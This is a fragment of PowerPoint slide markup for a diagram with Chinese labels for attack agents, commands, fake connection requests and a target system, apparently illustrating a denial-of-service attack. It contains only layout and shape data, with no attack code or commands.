            <p:cNvPr id="37994" name="Picture 99"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609600" y="3505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a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="2778125"/>
            <a:ext cx="3733800" cy="2327275"/>
            <a:chOff x="1371600" y="2777526"/>
            <a:chExt cx="3733800" cy="2327874"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37986" name="Line 105"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1371600" y="2819400"/>
              <a:ext cx="2743200" cy="1143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7" name="Line 106"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1371600" y="3962400"/>
              <a:ext cx="3733800" cy="5334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8" name="Line 107"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1371600" y="3962400"/>
              <a:ext cx="20574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9" name="Line 108"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1371600" y="3962400"/>
              <a:ext cx="2743200" cy="1143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0" name="Line 109"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1447800" y="3200400"/>
              <a:ext cx="3657600" cy="762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1" name="PPBand284"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="-1327687">
              <a:off x="2449513" y="2777526"/>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t>指令</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="组合 7"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="2514600"/>
            <a:ext cx="3924300" cy="2667000"/>
            <a:chOff x="4114800" y="2514600"/>
            <a:chExt cx="3924300" cy="2667000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37980" name="Line 112"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5715000" y="3962400"/>
              <a:ext cx="1828800" cy="5334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1" name="Line 113"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4800600" y="4114800"/>
              <a:ext cx="2819400" cy="10668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2" name="Line 114"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5715000" y="3200400"/>
              <a:ext cx="1828800" cy="4572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3" name="Line 115"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4800600" y="2514600"/>
              <a:ext cx="2819400" cy="9906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4" name="Line 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4114800" y="3810000"/>
              <a:ext cx="3429000" cy="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5" name="PPBand287"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="1090556">
              <a:off x="5334000" y="2556943"/>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latin typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>虚假的连接请求</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="宋体" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="37" name="组合 36"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7308850" y="3213100"/>
            <a:ext cx="1446213" cy="1511300"/>
            <a:chOff x="7230144" y="3140968"/>
            <a:chExt cx="1446312" cy="1512168"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="37977" name="Picture 9" descr="desktopp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3786" y="3140968"/>
              <a:ext cx="884564" cy="97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8" name="PPBand274"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7230144" y="4265338"/>
              <a:ext cx="1446312"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spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="de-DE" sz="2400" b="1"/>
                <a:t>目标系统</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="37979"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5568" y="329546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a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="1557338"/>
            <a:ext cx="2232025" cy="3990975"/>
            <a:chOff x="3428603" y="1556792"/>
            <a:chExt cx="2232422" cy="3991521"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="37902" name="Object 0"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="4267200" y="2362200"/>
            <a:ext cx="474663" cy="520700"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s668906" name="Photo Editor Photo" r:id="rId7" imgW="952633" imgH="1047619" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Photo Editor Photo" r:id="rId7" imgW="952633" imgH="1047619" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0" name="Picture 8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3622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3" name="Object 1"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="5181600" y="3048000"/>
            <a:ext cx="474663" cy="522288"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s668907" name="Photo Editor Photo" r:id="rId9" imgW="952633" imgH="1047619" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Photo Editor Photo" r:id="rId9" imgW="952633" imgH="1047619" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0" name="Picture 8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30480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4" name="Object 2"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="4267200" y="5029200"/>
            <a:ext cx="471488" cy="519113"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s668908" name="Photo Editor Photo" r:id="rId10" imgW="952633" imgH="1047619" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Photo Editor Photo" r:id="rId10" imgW="952633" imgH="1047619" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0" name="Picture 8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0292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5" name="Object 4"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="5181600" y="4267200"/>
            <a:ext cx="479425" cy="527050"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s668909" name="Photo Editor Photo" r:id="rId11" imgW="952633" imgH="1047619" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Photo Editor Photo" r:id="rId11" imgW="952633" imgH="1047619" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0" name="Picture 8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2672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906" name="Picture 100"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4267200" y="2133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7" name="Picture 101"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5181600" y="2819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Picture 103"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5181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9" name="Picture 104"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4267200" y="4800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PPBand285"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3459088" y="1556792"/>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de-DE" sz="2400" b="1"/>
                <a:t>攻击代理</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="37911" name="Group 25"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3428603" y="3581400"/>
              <a:ext cx="762000" cy="685800"/>
              <a:chOff x="432" y="2835"/>
              <a:chExt cx="1238" cy="1123"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="37913" name="Freeform 26"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="619" y="2844"/>
                <a:ext cx="132" cy="106"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 397"/>
                  <a:gd name="T1" fmla="*/ 0 h 318"/>
                  <a:gd name="T2" fmla="*/ 0 w 397"/>
                  <a:gd name="T3" fmla="*/ 0 h 318"/>
                  <a:gd name="T4" fmla="*/ 0 w 397"/>
                  <a:gd name="T5" fmla="*/ 0 h 318"/>
                  <a:gd name="T6" fmla="*/ 0 w 397"/>
                  <a:gd name="T7" fmla="*/ 0 h 318"/>
                  <a:gd name="T8" fmla="*/ 0 w 397"/>
                  <a:gd name="T9" fmla="*/ 0 h 318"/>
                  <a:gd name="T10" fmla="*/ 0 w 397"/>
                  <a:gd name="T11" fmla="*/ 0 h 318"/>
                  <a:gd name="T12" fmla="*/ 0 w 397"/>
                  <a:gd name="T13" fmla="*/ 0 h 318"/>
                  <a:gd name="T14" fmla="*/ 0 w 397"/>
                  <a:gd name="T15" fmla="*/ 0 h 318"/>
                  <a:gd name="T16" fmla="*/ 0 w 397"/>
                  <a:gd name="T17" fmla="*/ 0 h 318"/>
                  <a:gd name="T18" fmla="*/ 0 w 397"/>
                  <a:gd name="T19" fmla="*/ 0 h 318"/>
                  <a:gd name="T20" fmla="*/ 0 w 397"/>
                  <a:gd name="T21" fmla="*/ 0 h 318"/>
                  <a:gd name="T22" fmla="*/ 0 w 397"/>
                  <a:gd name="T23" fmla="*/ 0 h 318"/>
                  <a:gd name="T24" fmla="*/ 0 w 397"/>
                  <a:gd name="T25" fmla="*/ 0 h 318"/>
                  <a:gd name="T26" fmla="*/ 0 w 397"/>
                  <a:gd name="T27" fmla="*/ 0 h 318"/>
                  <a:gd name="T28" fmla="*/ 0 w 397"/>
                  <a:gd name="T29" fmla="*/ 0 h 318"/>
                  <a:gd name="T30" fmla="*/ 0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Freeform 27"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="679" y="2857"/>
                <a:ext cx="978" cy="374"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2934"/>
                  <a:gd name="T1" fmla="*/ 0 h 1122"/>
                  <a:gd name="T2" fmla="*/ 0 w 2934"/>
                  <a:gd name="T3" fmla="*/ 0 h 1122"/>
                  <a:gd name="T4" fmla="*/ 0 w 2934"/>
                  <a:gd name="T5" fmla="*/ 0 h 1122"/>
                  <a:gd name="T6" fmla="*/ 0 w 2934"/>
                  <a:gd name="T7" fmla="*/ 0 h 1122"/>
                  <a:gd name="T8" fmla="*/ 0 w 2934"/>
                  <a:gd name="T9" fmla="*/ 0 h 1122"/>
                  <a:gd name="T10" fmla="*/ 0 w 2934"/>
                  <a:gd name="T11" fmla="*/ 0 h 1122"/>
                  <a:gd name="T12" fmla="*/ 0 w 2934"/>
                  <a:gd name="T13" fmla="*/ 0 h 1122"/>
                  <a:gd name="T14" fmla="*/ 0 w 2934"/>
                  <a:gd name="T15" fmla="*/ 0 h 1122"/>
                  <a:gd name="T16" fmla="*/ 0 w 2934"/>
                  <a:gd name="T17" fmla="*/ 0 h 1122"/>
                  <a:gd name="T18" fmla="*/ 0 w 2934"/>
                  <a:gd name="T19" fmla="*/ 0 h 1122"/>
                  <a:gd name="T20" fmla="*/ 0 w 2934"/>
                  <a:gd name="T21" fmla="*/ 0 h 1122"/>
                  <a:gd name="T22" fmla="*/ 0 w 2934"/>
                  <a:gd name="T23" fmla="*/ 0 h 1122"/>
                  <a:gd name="T24" fmla="*/ 0 w 2934"/>
                  <a:gd name="T25" fmla="*/ 0 h 1122"/>
                  <a:gd name="T26" fmla="*/ 0 w 2934"/>
                  <a:gd name="T27" fmla="*/ 0 h 1122"/>
                  <a:gd name="T28" fmla="*/ 0 w 2934"/>
                  <a:gd name="T29" fmla="*/ 0 h 1122"/>
                  <a:gd name="T30" fmla="*/ 0 w 2934"/>
                  <a:gd name="T31" fmla="*/ 0 h 1122"/>
                  <a:gd name="T32" fmla="*/ 0 w 2934"/>
                  <a:gd name="T33" fmla="*/ 0 h 1122"/>
                  <a:gd name="T34" fmla="*/ 0 w 2934"/>
                  <a:gd name="T35" fmla="*/ 0 h 1122"/>
                  <a:gd name="T36" fmla="*/ 0 w 2934"/>
                  <a:gd name="T37" fmla="*/ 0 h 1122"/>
                  <a:gd name="T38" fmla="*/ 0 w 2934"/>
                  <a:gd name="T39" fmla="*/ 0 h 1122"/>
                  <a:gd name="T40" fmla="*/ 0 w 2934"/>
                  <a:gd name="T41" fmla="*/ 0 h 1122"/>
                  <a:gd name="T42" fmla="*/ 0 w 2934"/>
                  <a:gd name="T43" fmla="*/ 0 h 1122"/>
                  <a:gd name="T44" fmla="*/ 0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5" name="Freeform 28"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="713" y="2899"/>
                <a:ext cx="911" cy="326"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2734"/>
                  <a:gd name="T1" fmla="*/ 0 h 978"/>
                  <a:gd name="T2" fmla="*/ 0 w 2734"/>
                  <a:gd name="T3" fmla="*/ 0 h 978"/>
                  <a:gd name="T4" fmla="*/ 0 w 2734"/>
                  <a:gd name="T5" fmla="*/ 0 h 978"/>
                  <a:gd name="T6" fmla="*/ 0 w 2734"/>
                  <a:gd name="T7" fmla="*/ 0 h 978"/>
                  <a:gd name="T8" fmla="*/ 0 w 2734"/>
                  <a:gd name="T9" fmla="*/ 0 h 978"/>
                  <a:gd name="T10" fmla="*/ 0 w 2734"/>
                  <a:gd name="T11" fmla="*/ 0 h 978"/>
                  <a:gd name="T12" fmla="*/ 0 w 2734"/>
                  <a:gd name="T13" fmla="*/ 0 h 978"/>
                  <a:gd name="T14" fmla="*/ 0 w 2734"/>
                  <a:gd name="T15" fmla="*/ 0 h 978"/>
                  <a:gd name="T16" fmla="*/ 0 w 2734"/>
                  <a:gd name="T17" fmla="*/ 0 h 978"/>
                  <a:gd name="T18" fmla="*/ 0 w 2734"/>
                  <a:gd name="T19" fmla="*/ 0 h 978"/>
                  <a:gd name="T20" fmla="*/ 0 w 2734"/>
                  <a:gd name="T21" fmla="*/ 0 h 978"/>
                  <a:gd name="T22" fmla="*/ 0 w 2734"/>
                  <a:gd name="T23" fmla="*/ 0 h 978"/>
                  <a:gd name="T24" fmla="*/ 0 w 2734"/>
                  <a:gd name="T25" fmla="*/ 0 h 978"/>
                  <a:gd name="T26" fmla="*/ 0 w 2734"/>
                  <a:gd name="T27" fmla="*/ 0 h 978"/>
                  <a:gd name="T28" fmla="*/ 0 w 2734"/>
                  <a:gd name="T29" fmla="*/ 0 h 978"/>
                  <a:gd name="T30" fmla="*/ 0 w 2734"/>
                  <a:gd name="T31" fmla="*/ 0 h 978"/>
                  <a:gd name="T32" fmla="*/ 0 w 2734"/>
                  <a:gd name="T33" fmla="*/ 0 h 978"/>
                  <a:gd name="T34" fmla="*/ 0 w 2734"/>
                  <a:gd name="T35" fmla="*/ 0 h 978"/>
                  <a:gd name="T36" fmla="*/ 0 w 2734"/>
                  <a:gd name="T37" fmla="*/ 0 h 978"/>
                  <a:gd name="T38" fmla="*/ 0 w 2734"/>
                  <a:gd name="T39" fmla="*/ 0 h 978"/>
                  <a:gd name="T40" fmla="*/ 0 w 2734"/>
                  <a:gd name="T41" fmla="*/ 0 h 978"/>
                  <a:gd name="T42" fmla="*/ 0 w 2734"/>
                  <a:gd name="T43" fmla="*/ 0 h 978"/>
                  <a:gd name="T44" fmla="*/ 0 w 2734"/>
                  <a:gd name="T45" fmla="*/ 0 h 978"/>
                  <a:gd name="T46" fmla="*/ 0 w 2734"/>
                  <a:gd name="T47" fmla="*/ 0 h 978"/>
                  <a:gd name="T48" fmla="*/ 0 w 2734"/>
                  <a:gd name="T49" fmla="*/ 0 h 978"/>
                  <a:gd name="T50" fmla="*/ 0 w 2734"/>
                  <a:gd name="T51" fmla="*/ 0 h 978"/>
                  <a:gd name="T52" fmla="*/ 0 w 2734"/>
                  <a:gd name="T53" fmla="*/ 0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6" name="Freeform 29"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="624" y="2872"/>
                <a:ext cx="110" cy="79"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 332"/>
                  <a:gd name="T1" fmla="*/ 0 h 237"/>
                  <a:gd name="T2" fmla="*/ 0 w 332"/>
                  <a:gd name="T3" fmla="*/ 0 h 237"/>
                  <a:gd name="T4" fmla="*/ 0 w 332"/>
                  <a:gd name="T5" fmla="*/ 0 h 237"/>
                  <a:gd name="T6" fmla="*/ 0 w 332"/>
                  <a:gd name="T7" fmla="*/ 0 h 237"/>
                  <a:gd name="T8" fmla="*/ 0 w 332"/>
                  <a:gd name="T9" fmla="*/ 0 h 237"/>
                  <a:gd name="T10" fmla="*/ 0 w 332"/>
                  <a:gd name="T11" fmla="*/ 0 h 237"/>
                  <a:gd name="T12" fmla="*/ 0 w 332"/>
                  <a:gd name="T13" fmla="*/ 0 h 237"/>
                  <a:gd name="T14" fmla="*/ 0 w 332"/>
                  <a:gd name="T15" fmla="*/ 0 h 237"/>
                  <a:gd name="T16" fmla="*/ 0 w 332"/>
                  <a:gd name="T17" fmla="*/ 0 h 237"/>
                  <a:gd name="T18" fmla="*/ 0 w 332"/>
                  <a:gd name="T19" fmla="*/ 0 h 237"/>
                  <a:gd name="T20" fmla="*/ 0 w 332"/>
                  <a:gd name="T21" fmla="*/ 0 h 237"/>
                  <a:gd name="T22" fmla="*/ 0 w 332"/>
                  <a:gd name="T23" fmla="*/ 0 h 237"/>
                  <a:gd name="T24" fmla="*/ 0 w 332"/>
                  <a:gd name="T25" fmla="*/ 0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7" name="Freeform 30"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="489" y="2951"/>
                <a:ext cx="1066" cy="996"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3199"/>
                  <a:gd name="T1" fmla="*/ 0 h 2988"/>
                  <a:gd name="T2" fmla="*/ 0 w 3199"/>
                  <a:gd name="T3" fmla="*/ 0 h 2988"/>
                  <a:gd name="T4" fmla="*/ 0 w 3199"/>
                  <a:gd name="T5" fmla="*/ 0 h 2988"/>
                  <a:gd name="T6" fmla="*/ 0 w 3199"/>
                  <a:gd name="T7" fmla="*/ 0 h 2988"/>
                  <a:gd name="T8" fmla="*/ 0 w 3199"/>
                  <a:gd name="T9" fmla="*/ 0 h 2988"/>
                  <a:gd name="T10" fmla="*/ 0 w 3199"/>
                  <a:gd name="T11" fmla="*/ 0 h 2988"/>
                  <a:gd name="T12" fmla="*/ 0 w 3199"/>
                  <a:gd name="T13" fmla="*/ 0 h 2988"/>
                  <a:gd name="T14" fmla="*/ 0 w 3199"/>
                  <a:gd name="T15" fmla="*/ 0 h 2988"/>
                  <a:gd name="T16" fmla="*/ 0 w 3199"/>
                  <a:gd name="T17" fmla="*/ 0 h 2988"/>
                  <a:gd name="T18" fmla="*/ 0 w 3199"/>
                  <a:gd name="T19" fmla="*/ 0 h 2988"/>
                  <a:gd name="T20" fmla="*/ 0 w 3199"/>
                  <a:gd name="T21" fmla="*/ 0 h 2988"/>
                  <a:gd name="T22" fmla="*/ 0 w 3199"/>
                  <a:gd name="T23" fmla="*/ 0 h 2988"/>
                  <a:gd name="T24" fmla="*/ 0 w 3199"/>
                  <a:gd name="T25" fmla="*/ 0 h 2988"/>
                  <a:gd name="T26" fmla="*/ 0 w 3199"/>
                  <a:gd name="T27" fmla="*/ 0 h 2988"/>
                  <a:gd name="T28" fmla="*/ 0 w 3199"/>
                  <a:gd name="T29" fmla="*/ 0 h 2988"/>
                  <a:gd name="T30" fmla="*/ 0 w 3199"/>
                  <a:gd name="T31" fmla="*/ 0 h 2988"/>
                  <a:gd name="T32" fmla="*/ 0 w 3199"/>
                  <a:gd name="T33" fmla="*/ 0 h 2988"/>
                  <a:gd name="T34" fmla="*/ 0 w 3199"/>
                  <a:gd name="T35" fmla="*/ 0 h 2988"/>
                  <a:gd name="T36" fmla="*/ 0 w 3199"/>
                  <a:gd name="T37" fmla="*/ 0 h 2988"/>
                  <a:gd name="T38" fmla="*/ 0 w 3199"/>
                  <a:gd name="T39" fmla="*/ 0 h 2988"/>
                  <a:gd name="T40" fmla="*/ 0 w 3199"/>
                  <a:gd name="T41" fmla="*/ 0 h 2988"/>
                  <a:gd name="T42" fmla="*/ 0 w 3199"/>
                  <a:gd name="T43" fmla="*/ 0 h 2988"/>
                  <a:gd name="T44" fmla="*/ 0 w 3199"/>
                  <a:gd name="T45" fmla="*/ 0 h 2988"/>
                  <a:gd name="T46" fmla="*/ 0 w 3199"/>
                  <a:gd name="T47" fmla="*/ 0 h 2988"/>
                  <a:gd name="T48" fmla="*/ 0 w 3199"/>
                  <a:gd name="T49" fmla="*/ 0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8" name="Freeform 31"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="763" y="3008"/>
                <a:ext cx="585" cy="575"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1757"/>
                  <a:gd name="T1" fmla="*/ 0 h 1724"/>
                  <a:gd name="T2" fmla="*/ 0 w 1757"/>
                  <a:gd name="T3" fmla="*/ 0 h 1724"/>
                  <a:gd name="T4" fmla="*/ 0 w 1757"/>
                  <a:gd name="T5" fmla="*/ 0 h 1724"/>
                  <a:gd name="T6" fmla="*/ 0 w 1757"/>
                  <a:gd name="T7" fmla="*/ 0 h 1724"/>
                  <a:gd name="T8" fmla="*/ 0 w 1757"/>
                  <a:gd name="T9" fmla="*/ 0 h 1724"/>
                  <a:gd name="T10" fmla="*/ 0 w 1757"/>
                  <a:gd name="T11" fmla="*/ 0 h 1724"/>
                  <a:gd name="T12" fmla="*/ 0 w 1757"/>
                  <a:gd name="T13" fmla="*/ 0 h 1724"/>
                  <a:gd name="T14" fmla="*/ 0 w 1757"/>
                  <a:gd name="T15" fmla="*/ 0 h 1724"/>
                  <a:gd name="T16" fmla="*/ 0 w 1757"/>
                  <a:gd name="T17" fmla="*/ 0 h 1724"/>
                  <a:gd name="T18" fmla="*/ 0 w 1757"/>
                  <a:gd name="T19" fmla="*/ 0 h 1724"/>
                  <a:gd name="T20" fmla="*/ 0 w 1757"/>
                  <a:gd name="T21" fmla="*/ 0 h 1724"/>
                  <a:gd name="T22" fmla="*/ 0 w 1757"/>
                  <a:gd name="T23" fmla="*/ 0 h 1724"/>
                  <a:gd name="T24" fmla="*/ 0 w 1757"/>
                  <a:gd name="T25" fmla="*/ 0 h 1724"/>
                  <a:gd name="T26" fmla="*/ 0 w 1757"/>
                  <a:gd name="T27" fmla="*/ 0 h 1724"/>
                  <a:gd name="T28" fmla="*/ 0 w 1757"/>
                  <a:gd name="T29" fmla="*/ 0 h 1724"/>
                  <a:gd name="T30" fmla="*/ 0 w 1757"/>
                  <a:gd name="T31" fmla="*/ 0 h 1724"/>
                  <a:gd name="T32" fmla="*/ 0 w 1757"/>
                  <a:gd name="T33" fmla="*/ 0 h 1724"/>
                  <a:gd name="T34" fmla="*/ 0 w 1757"/>
                  <a:gd name="T35" fmla="*/ 0 h 1724"/>
                  <a:gd name="T36" fmla="*/ 0 w 1757"/>
                  <a:gd name="T37" fmla="*/ 0 h 1724"/>
                  <a:gd name="T38" fmla="*/ 0 w 1757"/>
                  <a:gd name="T39" fmla="*/ 0 h 1724"/>
                  <a:gd name="T40" fmla="*/ 0 w 1757"/>
                  <a:gd name="T41" fmla="*/ 0 h 1724"/>
                  <a:gd name="T42" fmla="*/ 0 w 1757"/>
                  <a:gd name="T43" fmla="*/ 0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9" name="Freeform 32"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="438" y="3229"/>
                <a:ext cx="462" cy="251"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1386"/>
                  <a:gd name="T1" fmla="*/ 0 h 753"/>
                  <a:gd name="T2" fmla="*/ 0 w 1386"/>
                  <a:gd name="T3" fmla="*/ 0 h 753"/>
                  <a:gd name="T4" fmla="*/ 0 w 1386"/>
                  <a:gd name="T5" fmla="*/ 0 h 753"/>
                  <a:gd name="T6" fmla="*/ 0 w 1386"/>
                  <a:gd name="T7" fmla="*/ 0 h 753"/>
                  <a:gd name="T8" fmla="*/ 0 w 1386"/>
                  <a:gd name="T9" fmla="*/ 0 h 753"/>
                  <a:gd name="T10" fmla="*/ 0 w 1386"/>
                  <a:gd name="T11" fmla="*/ 0 h 753"/>
                  <a:gd name="T12" fmla="*/ 0 w 1386"/>
